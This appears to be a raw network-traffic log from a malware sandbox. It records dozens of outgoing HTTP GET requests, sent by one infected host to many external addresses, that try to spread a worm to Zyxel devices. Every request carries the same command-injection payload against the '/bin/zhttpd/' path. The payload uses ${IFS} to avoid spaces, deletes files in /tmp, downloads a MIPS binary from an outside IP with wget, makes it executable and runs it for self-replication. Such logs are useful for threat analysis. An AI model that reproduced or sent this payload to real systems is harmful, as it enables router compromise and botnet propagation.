                                                            Jan 28, 2024 10:12:07.443003893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            242192.168.2.1335716201.144.134.65443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443039894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            243192.168.2.135087648.5.47.96443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443048954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            244192.168.2.1360358151.15.201.16443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443123102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            245192.168.2.135460896.110.198.172443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443134069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            246192.168.2.1343134103.35.100.28443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443151951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            247192.168.2.1347106208.105.216.240443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443176031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            248192.168.2.1333110206.95.105.44443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443195105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            249192.168.2.1342144220.184.4.95443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443250895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            250192.168.2.1349630103.134.80.29443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443299055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            251192.168.2.134168834.247.196.159443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443344116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            252192.168.2.1344908164.251.170.13443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443392992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            253192.168.2.1348096193.136.183.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443394899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            254192.168.2.1333772144.25.225.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443420887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            255192.168.2.1344876121.139.11.249443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443475008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            256192.168.2.1340396205.11.39.132443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443502903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            257192.168.2.1346348159.138.9.146443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443526030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            258192.168.2.134938676.207.219.179443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443552017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            259192.168.2.133483484.53.202.193443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443589926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            260192.168.2.1334720162.94.126.207443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443605900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            261192.168.2.1333804195.26.175.116443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443675041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            262192.168.2.1358628159.103.28.4443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443675995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            263192.168.2.1338320158.46.44.214443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443701982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            264192.168.2.13587868.11.157.10443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443737030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            265192.168.2.1336028164.26.146.112443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443783998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            266192.168.2.134864270.136.64.36443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443804979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            267192.168.2.1357034212.178.194.129443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443829060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            268192.168.2.135927261.89.15.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443873882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            269192.168.2.1353176142.9.5.172443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443909883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            270192.168.2.1337248170.134.52.158443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443924904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            271192.168.2.1349518149.2.41.213443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443953037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            272192.168.2.136053879.64.199.231443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.443996906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            273192.168.2.135370468.1.218.244443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.444027901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            274192.168.2.133323484.177.5.85443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.444472075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            275192.168.2.1354466188.45.159.155443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.444574118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            276192.168.2.135742470.174.71.253443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:07.444602966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            277192.168.2.1360542150.161.159.34443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:08.448395014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            278192.168.2.1352746208.165.69.61443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451288939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            279192.168.2.135627085.205.225.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451288939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            280192.168.2.1346328151.135.185.147443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451289892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            281192.168.2.13412249.141.131.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451329947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            282192.168.2.1345192111.8.157.112443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451342106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            283192.168.2.133470858.220.180.190443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451374054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            284192.168.2.1333952152.253.217.219443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451392889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            285192.168.2.1355974174.191.44.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451404095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            286192.168.2.1352298120.134.65.3443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451450109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            287192.168.2.1349838211.168.35.171443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451472044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            288192.168.2.1338514108.131.9.41443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451543093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            289192.168.2.1360588154.130.59.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451559067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            290192.168.2.13476101.164.236.26443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451559067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            291192.168.2.134929687.142.12.90443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451601982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            292192.168.2.134186239.114.149.182443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451661110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            293192.168.2.134682050.118.249.113443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451662064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            294192.168.2.1352976145.101.163.120443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451695919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            295192.168.2.1332852189.102.94.1443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451749086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            296192.168.2.13563064.224.246.100443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451801062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            297192.168.2.134360863.183.173.161443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451836109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            298192.168.2.1344526188.24.93.238443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451890945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            299192.168.2.1342646104.109.28.212443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451944113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            300192.168.2.1334668164.33.146.194443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451948881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            301192.168.2.1347014108.121.186.97443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.451971054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            302192.168.2.135818070.247.81.224443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:09.452013016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


